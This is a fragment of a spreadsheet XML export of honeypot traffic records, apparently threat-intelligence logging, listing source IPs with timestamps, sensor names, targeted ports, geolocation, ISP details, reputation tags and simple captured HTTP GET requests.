    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7f:9b10"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3850"/>
    <x v="3850"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:56:52"/>
    <d v="2024-12-11T06:06:30"/>
    <d v="2025-04-01T03:56:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:b83"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3851"/>
    <x v="3851"/>
    <s v="59-126-68-151.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:55:05"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T03:55:05"/>
    <n v="379"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;11403&amp;&amp;23"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:4497"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3852"/>
    <x v="3852"/>
    <s v="59-126-160-80.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:50:58"/>
    <d v="2023-11-05T19:14:00"/>
    <d v="2025-04-01T03:50:58"/>
    <n v="5260"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;22&amp;&amp;4435"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:a050"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3853"/>
    <x v="3853"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:50:56"/>
    <d v="2025-04-01T03:50:56"/>
    <d v="2025-04-01T03:50:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:9b84"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3854"/>
    <x v="3854"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:48:50"/>
    <d v="2025-03-31T21:23:11"/>
    <d v="2025-04-01T03:48:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:2cc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3855"/>
    <x v="3855"/>
    <s v="218-161-78-231.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:44:38"/>
    <d v="2024-12-16T07:02:10"/>
    <d v="2025-04-01T03:44:38"/>
    <n v="339"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&amp;&amp;50972&amp;&amp;51009&amp;&amp;51041&amp;&amp;51054&amp;&amp;11984&amp;&amp;50958&amp;&amp;50994&amp;&amp;51028&amp;&amp;56242&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:4ee7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3856"/>
    <x v="3856"/>
    <s v="59-126-72-231.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:28:44"/>
    <d v="2023-12-04T03:11:00"/>
    <d v="2025-04-01T03:28:44"/>
    <n v="465"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;28633&amp;&amp;23&amp;&amp;20573&amp;&amp;33286&amp;&amp;33296&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:48e7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3857"/>
    <x v="3857"/>
    <s v="122-116-142-53.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:26:18"/>
    <d v="2023-07-25T00:03:00"/>
    <d v="2025-04-01T03:26:18"/>
    <n v="3694"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_IPP_H39&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;5900&amp;&amp;1080&amp;&amp;80&amp;&amp;389&amp;&amp;22&amp;&amp;445&amp;&amp;631&amp;&amp;9875&amp;&amp;14029&amp;&amp;42810&amp;&amp;23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>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
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:8e35"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3858"/>
    <x v="3858"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:25:54"/>
    <d v="2025-04-01T00:10:44"/>
    <d v="2025-04-01T03:25:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:d206"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3859"/>
    <x v="3859"/>
    <s v="r179-25-82-45.dialup.adsl.anteldata.net.uy"/>
    <x v="0"/>
    <d v="2025-04-01T03:16:45"/>
    <d v="2025-03-31T21:22:52"/>
    <d v="2025-04-01T03:16:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="CA"/>
    <s v="Canelones"/>
    <s v="Paso Carrasco"/>
    <s v="Paso de Carrasco"/>
    <s v="3441292"/>
    <s v="NA"/>
    <s v="-34.8603"/>
    <s v="-56.0522"/>
    <s v="6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="business"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b319:522d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3860"/>
    <x v="3860"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:13:30"/>
    <d v="2025-03-31T08:24:26"/>
    <d v="2025-04-01T03:13:30"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:ed6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3861"/>
    <x v="3861"/>
    <s v="218-161-28-27.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:08:17"/>
    <d v="2024-09-11T06:59:00"/>
    <d v="2025-04-01T03:08:17"/>
    <n v="299"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;55655&amp;&amp;16686&amp;&amp;NA&amp;&amp;10586&amp;&amp;34394&amp;&amp;25866&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
